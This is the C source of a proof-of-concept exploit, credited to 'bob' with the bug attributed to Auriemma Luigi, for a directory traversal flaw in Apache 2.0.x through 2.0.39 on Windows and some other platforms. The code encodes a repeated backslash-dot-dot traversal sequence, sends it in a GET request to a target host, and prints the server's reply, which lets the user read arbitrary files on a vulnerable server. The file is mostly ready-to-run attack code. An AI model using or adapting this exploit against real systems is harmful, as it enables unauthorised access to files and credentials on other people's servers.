/*
 * DSR-apache2.0x by bob@dtors.net
 * Exploit found by Auriemma Luigi.
 * 
 * This is Proof on Concept exploit for
 * the current directory traversal design flaw 
 * in apache 2.0.x - 2.0.39.
 * 
 * Affected Systems:
 *
 * Windows [win32]
 * Netware
 * OS2
 * Cygwin
 *
 * This exploit allows the attacker to view ANY
 * file on the target machine if it is vulnerable
 * to this attack.
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define bs "%5c"
char travcode[]= 
			"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
			"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
			"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
			"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
			"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
			"\x25\x35\x63";


void reply(int sock);


void reply(int sock) 
{


int n;
char recvbuf[1024];
fd_set rset;
  
         
  while (1) {
    FD_ZERO(&rset);
    FD_SET(sock,&rset);
    FD_SET(STDIN_FILENO,&rset);
    select(sock+1,&rset,NULL,NULL,NULL);

    if (FD_ISSET(sock,&rset)) {
      if((n=read(sock,recvbuf,1024)) <= 0) {
        printf("Connection closed by foreign ghost.\n");
        exit(0);
      }         

      recvbuf[n]=0;
      printf("%s",recvbuf);
    }                      

    if (FD_ISSET(STDIN_FILENO,&rset)) {
      if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
        recvbuf[n]=0;
       //write(sock,recvbuf,n);
      }
    }
  }
}



int main(int argc, char *argv[]) {

int sock;
char exp[1024];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
 

fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n"); 
fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
 
if(argc<4) 
  {
   fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
   exit(1);
  } 

 

if ((he=gethostbyname(argv[1])) == NULL)
   {
   fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
   exit(1);
   }

/* A fresh pair of clean socks ;) */

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

/* yummy fresh smelling */

fprintf(stdout, "Hold up bish connecting to host... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     fprintf(stderr, "My socks are all sweaty.\n");
     exit(1);
     }

else {
/* im exhausted after that...gn */
sleep(3);



sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);    
write(sock,exp,strlen(exp));

fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
reply(sock);

close(sock);
exit (0);

}

}